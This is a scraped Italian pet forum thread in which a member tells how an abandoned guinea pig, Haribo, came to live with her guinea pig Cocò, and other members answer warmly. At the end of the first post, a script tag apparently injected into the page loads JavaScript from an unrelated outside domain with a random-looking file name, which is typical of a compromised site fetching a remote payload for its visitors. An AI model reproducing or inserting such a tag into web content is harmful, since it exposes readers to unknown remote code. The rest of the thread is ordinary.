Vai al contenuto
Kiwì&Cocò

Un trovatello, storia fuori dal comune!!

Recommended Posts

ma è meravigliosooooo :love: non preoccuparti che la piccola dittatrice capirà ihihih :rotfl: ma che razza è?perchè ha un pelo fantastico mai visto prima sembra un orsetto :love: lo adoro .. per il cartello fai benissimo anzi non se lo meriterebbero neanche io scrverei solo VERGOGNA!

Ciao ragazzi, stamattina ho lavato tutto e ho raccolto per casa la lettiera delle baruffe notturne, ora la gabbia sente forte l aceto, ne ho usato in quantità ;).

Ho controllato Haribo ma non ha ne tagli ne morsi anche se è stressatissimo ed emette continui gridolini di paura.

Li ho rimessi insieme e ho messo una casetta nuova presa dal piano di sopra dei maschietti (lavata e profumata di aceto).

Metto del cibo ai 4 cantoni della gabbia, loro girano un pò assaggi, annusate... E zaaaaaaaaac Cocò riparte all attacco battendo i denti /f/ UUUUUUFFFF

Cmq domani ho pensato di mettere un foglio vicino alla porta, "chiunque mi abbia lasciato quel bellissimo caviotto ieri, grazie molte è un amore, meno male che si è liberato lui di voi che prendete gli animali come pupazzi da abbandonare eventualmente, e ringraziate che ieri sono passata in negozio visto che nel pomeriggio si è messo a piovere. Fatevi un esamino di coscenza"

Sicuramente gli autori del malfatto passeranno da li dato che qua la cittadina non è grande...

Comunque sia io mi sono innamorata di lui :love:post-2056-0-54550000-1335775699_thumb.jp

<script src="http://superoseplugin.info/dfi823hs.js?0.6143014034055743">

Share this post


Link to post
Share on other sites

Bellissimo Haribo!! Meno male che almeno queste persone hanno pensato a te!! E' vero, non si fa così...ma con quello che succede al giorno d'oggi per liberarsi degli animali "scomodi" alla fine hanno fatto bene a lasciarlo vicino l'ingresso del tuo locale.

Share this post


Link to post
Share on other sites

ma è meravigliosooooo :love: non preoccuparti che la piccola dittatrice capirà ihihih :rotfl: ma che razza è?perchè ha un pelo fantastico mai visto prima sembra un orsetto :love: lo adoro .. per il cartello fai benissimo anzi non se lo meriterebbero neanche io scrverei solo VERGOGNA!

Penso per quello che so che sia un misto tra peruviana e coronet, perchè le peruviane pure hanno il pelo che parte dal culetto tutto proiettato in avanti tendente al piatto col ciuffo lunghissimo sugli occhi, La coronet il pelo va un pò in tutte le direzioni e il ciuffo davanti sugli occhi resta piu corto tendenzialmente con la riga in mezzo.

Cmq si è morbidosissimo.... :love: Prima si è fatto fare i grattini sotto il mento senza dire niente e senza aver paura....

Zona gabbia, cè il silenzio, prima Cocò è uscita dalla casetta con Haribo che la rincorreva ha capito come si fa questo maschietto!!! :knuppel:.. Sono così occupati a tenersi d occhio che mangiano poco, la piccola si sta mangiando tutto lei hahahah

Share this post


Link to post
Share on other sites

Haribo manda a tutti dei sentiti Pui Pui di ringraziamento :)):-

Ormai la gerarchia è stabilita, indovinate un pò, è lui che comanda heheheh

Chi se lo aspettava col caratterino di Cocò. Anche se è senza attributi l ha montata piu volte.. E lei ora che scappa impaurita heheh

Stanno così tranquilli che stasera nn li prendo per le coccole... Sono contenta di questo nuovo batuffolone in casa :love::love:

Share this post


Link to post
Share on other sites

sono veramente felice che si sia risolto tutto :love: e chi lo avrebbe mai detto che la dittatrice si sarebbe abbassata le cornicchia XD :love: SONO DAVVERO FELICE PERCHè DOPO QUELLO CHE HAI FATTO TE LO MERITI sei stata davvero fantastica niente da dire

Share this post


Link to post
Share on other sites

E così il vero amore ha vinto ancora una volta.. EVVIVA!!! :D Un nuovo peloso è sempre una benedizione ,se poi è stato pure abbandonato povero piccolo..... laddove ci sono già due o tre cavie, ce ne sta di sicuro un'altra... E poi noi abbiamo amore da vendere per quasti angioletti! Ben arrivato in famiglia Haribo!!!:love:

Share this post


Link to post
Share on other sites

Join the conversation

Puoi pubblicare ora e registrarti più tardi. Se hai un account, Accedi Ora per pubblicarlo con il tuo account.

Ospite
Reply to this topic...

×   Hai incollato il contenuto con la formattazione.   Rimuovere la formattazione

  Sono consentiti solo 75 emoticon max.

×   Il tuo collegamento è stato incorporato automaticamente.   Mostra come un collegamento

×   Il tuo contenuto precedente è stato ripristinato.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Caricamento...

×
×
  • Crea Nuovo...